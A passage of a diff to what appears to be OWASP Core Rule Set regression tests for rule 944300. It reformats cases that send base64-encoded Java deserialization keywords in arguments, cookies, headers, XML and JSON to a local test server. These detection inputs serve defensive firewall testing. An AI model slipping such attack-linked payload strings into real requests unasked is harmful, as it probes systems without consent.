"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-256 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" + output: + log: + expect_ids: [944300] + - test_id: 256 desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-257 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 257 desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-258 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 258 desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-259 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: 
+ expect_ids: [944300] + - test_id: 259 desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-260 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 260 desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-261 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 261 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-262 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 262 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-263 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 263 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-264 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" + output: + log: + expect_ids: [944300] + - test_id: 264 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-265 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 265 desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-266 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 266 desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-267 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" + output: + log: + expect_ids: [944300] + - test_id: 267 desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-268 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + uri: "/post" + 
version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 268 desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-269 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 269 desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-270 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 270 desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-271 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 271 desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: 
"id \"944300\"" - - test_title: 944300-272 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 272 desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-273 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 273 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-274 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 274 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-275 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" + output: + log: + expect_ids: [944300] + - test_id: 275 desc: "Content-Type application/json arg name includes keyword 
cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-276 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 276 desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-277 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 277 desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-278 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" + output: + log: + expect_ids: [944300] + - test_id: 278 desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - 
test_title: 944300-279 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 279 desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-280 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 280 desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 